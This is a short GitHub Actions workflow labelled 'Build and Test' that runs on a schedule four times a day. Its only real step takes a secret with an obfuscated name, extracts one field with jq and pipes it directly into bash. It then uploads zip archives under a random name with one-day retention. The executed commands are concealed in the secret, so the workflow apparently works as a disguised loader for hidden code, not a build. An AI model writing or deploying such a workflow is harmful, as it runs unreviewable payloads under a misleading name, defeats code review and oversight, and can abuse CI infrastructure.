name: Build and Test
on:
  workflow_dispatch:

  schedule:
    - cron: '36 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run
        env:
          alua7496: ${{ secrets.alua7496 }}
        run: |
          printf '%s' "$alua7496" | jq -r .vm665 | /bin/bash

      - name: Save archive
        uses: actions/upload-artifact@v4
        with:
          name: ujGlu6yp
          path: "*.zip"
          retention-days: 1
